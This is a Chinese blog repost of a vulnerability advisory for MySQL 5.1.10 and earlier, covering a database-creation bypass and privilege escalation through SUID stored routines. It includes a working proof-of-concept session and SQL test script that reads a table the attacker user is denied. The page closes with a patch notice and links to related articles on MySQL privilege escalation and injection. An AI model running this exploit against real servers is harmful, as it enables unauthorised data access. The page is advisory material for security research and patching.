通过mysql4.0提升权限_MySQL权限提升及安全限制绕过漏洞

最新推荐文章于 2023-10-27 09:50:43 发布
最新推荐文章于 2023-10-27 09:50:43 发布
阅读量103 收藏
点赞数
文章标签: 通过mysql4.0提升权限
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42495504/article/details/113237716
版权

受影响系统:

MySQL AB MySQL <= 5.1.10

描述:

BUGTRAQ ID: 19559

MySQL是一款使用非常广泛的开放源代码关系数据库系统,拥有各种平台的运行版本。

在MySQL上,拥有访问权限但无创建权限的用户可以创建与所访问数据库仅有名称字母大小写区别的新数据库。成功利用这个漏洞要求运行MySQL的文件系统支持区分大小写的文件名。

此外,由于在错误的安全环境中计算了suid例程的参数,攻击者可以通过存储的例程以例程定义者的权限执行任意DML语句。成功攻击要求用户对所存储例程拥有EXECUTE权限。

测试方法:

【警 告:以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!】

1、创建数据库

$ mysql -h my.mysql.server -u sample -p -A sample

Enter password:

Welcome to the MySQL monitor. Commands end with ; or \g.

Your MySQL connection id is 263935 to server version: 4.1.16-standard

mysql> create database another;

ERROR 1044: Access denied for user 'sample'@'%' to database 'another'

mysql> create database sAmple;

Query OK, 1 row affected (0.00 sec)

2、权限提升

--disable_warnings

drop database if exists mysqltest1;

drop database if exists mysqltest2;

drop function if exists f_suid;

--enable_warnings

# Prepare playground

create database mysqltest1;

create database mysqltest2;

create user malory@localhost;

grant all privileges on mysqltest1.* to malory@localhost;

# Create harmless (but SUID!) function

create function f_suid(i int) returns int return 0;

grant execute on function test.f_suid to malory@localhost;

use mysqltest2;

# Create table in which malory@localhost will be interested but to which

# he won't have any access

create table t1 (i int);

connect (malcon, localhost, malory,,mysqltest1);

# Correct malory@localhost don't have access to mysqltest2.t1

--error ER_TABLEACCESS_DENIED_ERROR

select * from mysqltest2.t1;

# Create function which will allow to exploit security hole

delimiter |;

create function f_evil ()

returns int

sql security invoker

begin

set @a:= current_user();

set @b:= (select count(*) from mysqltest2.t1);

return 0;

end|

delimiter ;|

# Again correct

--error ER_TABLEACCESS_DENIED_ERROR

select f_evil();

select @a, @b;

# Oops!!! it seems that f_evil() is executed in the context of

# f_suid() definer, so malory@locahost gets all info that he wants

select test.f_suid(f_evil());

select @a, @b;

connection default;

drop user malory@localhost;

drop database mysqltest1;

drop database mysqltest2;

建议:

厂商补丁:MySQL AB

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载。

梅大林
关注
SQL注入和sql-labs通关1-18(手工注入、高权限注入、文件读写、提交方式、查询方式、WAF绕过、sqlmap)
m0_61506558的博客
07-25 929
对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。......
mysql 漏洞_【重大漏洞预警】Mysql代码执行漏洞,可本地提权(含exp)
weixin_42165712的博客
01-18 2817
概要Mysql (5.7, 5.6, 和 5.5版本)的所有默认安装配置,包括最新的版本,攻击者可以远程和本地利用该漏洞。该漏洞需要认证访问MYSQL数据库(通过网络连接或者像phpMyAdmin的web接口),以及通过SQL注入利用。攻击者成功利用该漏洞可以以ROOT权限执行代码,完全控制服务器。利用条件:首先你要有一个Mysql权限用户,仅需有FIle权限(例如:虚拟主机通常会提供,因为需...
(四)mysql数据库总结和渗透测试相关漏洞整理
爱上卿的博客
01-16 2467
1.1 Mysql信息收集 1.端口信息收集 Mysql默认端口是3306端口,但也有自定义端口,针对默认端口扫描主要利用扫描软件进行探测,推荐使用: (1)IIS PUT scanner,直接填写3306端口,IP地址填写单个或者C段地址,速度还是挺快的。 (2)nmap扫描nmap -p 3306 192.168.1.1-254 特定目标的渗透,可能需要对全端口进行扫描,可以使...
mysql权限漏洞_MySQL权限提升安全限制绕过漏洞
weixin_42102401的博客
01-20 202
1、创建数据库$ mysql -h my.mysql.server -u sample -p -A sampleEnter password:Welcome to the MySQL monitor. Commands end with ; or \g.Your MySQL connection id is 263935 to server version: 4.1.16-standardmysq...
4.0.13 mysql 注入_Beescms_v4.0 sql注入漏洞分析
weixin_31526891的博客
01-26 516
Beescms_v4.0 sql注入漏洞分析一、漏洞描述Beescms v4.0由于后台登录验证码设计缺陷以及代码防护缺陷导致存在bypass全局防护的SQL注入。二、漏洞环境搭建1、官方下载Beescms v4.0,下载地址: http://beescms.com/cxxz.html2、解压压缩文件,然后把文件放到phpstudy的网站根目录3、浏览器访问http://192.168.10.17...
mysql 漏洞排查_MySQL最新漏洞分析_MySQL
weixin_42549723的博客
02-07 1713
bitsCN.com在seclists中看到一个很惊人的thread:http://seclists.org/oss-sec/2012/q2/493MySQL爆出了一个很大的安全漏洞,几乎影响5.1至5.5的所有版本。出问题的模块是登录时密码校验的部分(password.c),在知道用户名的情况下(如root),直接反复重试(平均大约256次)即可登入。不过,MySQL身份认证的时候是采用3元组,...
mysql 连续登陆漏洞_MySQL 严重 Bug - 用户登陆漏洞[转发]
weixin_35710050的博客
01-19 134
Security vulnerability in MySQL/MariaDB 在知道用户名的情况下(如root),直接反复重试(平均大约256次)即可登入。受影响的版本:All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable.MariaDB versions from 5.1.62, 5....
10-sql注入-mysql注入1
08-03
SQL注入是一种常见的安全漏洞,通常发生在Web应用程序中,允许攻击者通过输入恶意SQL代码来操纵数据库。MySQL注入是其中一种,特别针对使用MySQL数据库的应用。本文将深入探讨MySQL注入的原理、常见攻击手段以及防范...
浅析基于asp.net的网站安全漏洞及防范
09-13
本文结合自行开发的远程教育训练系统过程中出现的安全测试问题,探讨了在ASP.NET开发环境下常见的几种安全漏洞,包括SQL注入式攻击、查询字符串式数据传递、绕过登录直接进入页面、输入框中输入恶意代码以及数据库...
红队专题-Perm权限提升与维持隐匿Privilege Escalation
最新发布
aming小老弟
10-27 1048
权限不仅能对更多文件进行增删改查的操作,方便进一步收集主机系统中的敏感信息, system权限也可以提取内存中的密码Hash,为进一步的渗透提供更多信息。权限提升是从初始访问权限(通常是标准用户或应用程序帐户)一直提升到administrator, root甚至SYSTEM访问权限的艺术。常见技术或攻击手段来获得高权限帐户访问权限。用于检测和利用不同权限提升技术的手动方法,但会提到可以完成相同工作并节省您一些时间的自动化工具。 完美,它指向我们的有效负载。 使用net(也是默认安装的)启动此服务以获得
owasp测试指南 v4.0
04-19
5. 授权测试:此部分涉及对目录遍历/文件包含、授权绕过权限提升以及不安全对象直接引用等攻击面的测试,目的是确保应用能够正确地限制用户权限,避免未授权访问敏感资源。 6. 会话管理测试:会话管理测试包括了...
MySQL数据库渗透及漏洞利用总结
05-09 4269
Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前很多架构都以Mysql作为数据库管理系统,例如LAMP、和W...
MySQL提权篇
热门推荐
Grey的博客
05-12 3万+
一、Mysql提权必备条件1.服务器安装Mysql数据库利用Mysql提权的前提就是服务器安装了mysql数据库,且mysql的服务没有降权,Mysql数据库默认安装是以系统权限继承的,并且需要获取Mysql root账号密码。2.判断Mysql服务运行权限对于Mysql数据库服务运行权限有很多方法,我这里主要介绍三种,一种是通过查看系统账号,也即使用“net user”命令查看系统当前账号,如果...
什么是0day漏洞
zxのdream
10-24 1万+
0day漏洞
mysql5.7的高危漏洞_应用CVE: 最新的Mysql高危漏洞介绍
weixin_33240461的博客
02-02 2080
MySQL官方最近做了一个大的安全漏洞补丁,修复了25 个安全漏洞,关于这些漏洞细节官方和媒体目前为止还有比较少的介绍和分析文章。在此笔者搜集下相关的详细,从邮件讨论组趴到一些细节信息,在此介绍一下几个比较重要的、高危的漏洞。包括CVE-2018-2696,CVE-2018-2591和CVE-2018-2562。CVE-2018-2696 mysql: sha256_password 认证长密码...
mysql 漏洞最少的版本_MySQL3.23.31之前版本安全漏洞_MySQL
weixin_34379040的博客
02-07 644
bitsCN.com所有小于 3.23.31 版本的 MySQL 都存在一个缓冲溢出漏洞导致MySQL 崩溃。使攻击者获得 mysqld 权限,而可以操纵所有数据库。攻击的前提是必须有一个合法的登录名和口令。下面为最初发表于 MySQL 邮件列表的信件摘要。==================================================漏洞是由Jo?o Gouveia 于1月1...
mysql 漏洞最少的版本_MySQL数据库各版本曝出重大漏洞
weixin_33983620的博客
01-19 1172
今天,爱范儿高级系统工程师@cheungtifan在新浪微博中披露了MySQL出现重大安全漏洞的消息,使得DBA的目光再次聚焦到数据库安全之上。微博原文如下:@cheungtifan:请各位 MySQL 用户注意,MySQL 几乎所有版本爆出了大漏洞,将允许不知道密码只知道用户名的用户登录进入MySQL。TechTarget数据库网站编辑随即查看了漏洞的具体信息,在MySQL和MariaDB数据库...
mysql 提权_通过Mysql提权的几种姿势
weixin_36304087的博客
01-18 1095
本文记录利用mysql数据库,在拿到shell之后进行提权的两种方法。一、UDF提权原理:UDF是mysql的一个拓展接口,UDF(Userdefined function)让用户通过该接口可以自定义mysql函数。UDF 定义需要DLL动态链接库文件支持。基本步骤:1、导出udf.dll文件到指定目录(有些webshell集成,直接导 出即可,没有,则需要上传)2、基于udf.dll创建自定义函...
MySQL UDF提权执行系统命令
谢公子的博客
12-06 3万+
目录 UDF UDF提权步骤 UDF提权复现(php环境) UDF UDF (user defined function),即用户自定义函数。是通过添加新函数,对MySQL的功能进行扩充,其实就像使用本地MySQL函数如user() 或 concat() 等。 那么,我们该如何使用UDF呢? 假设我的UDF文件名为 udf.dll,存放在MySQL安装目录的 lib/plugin ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值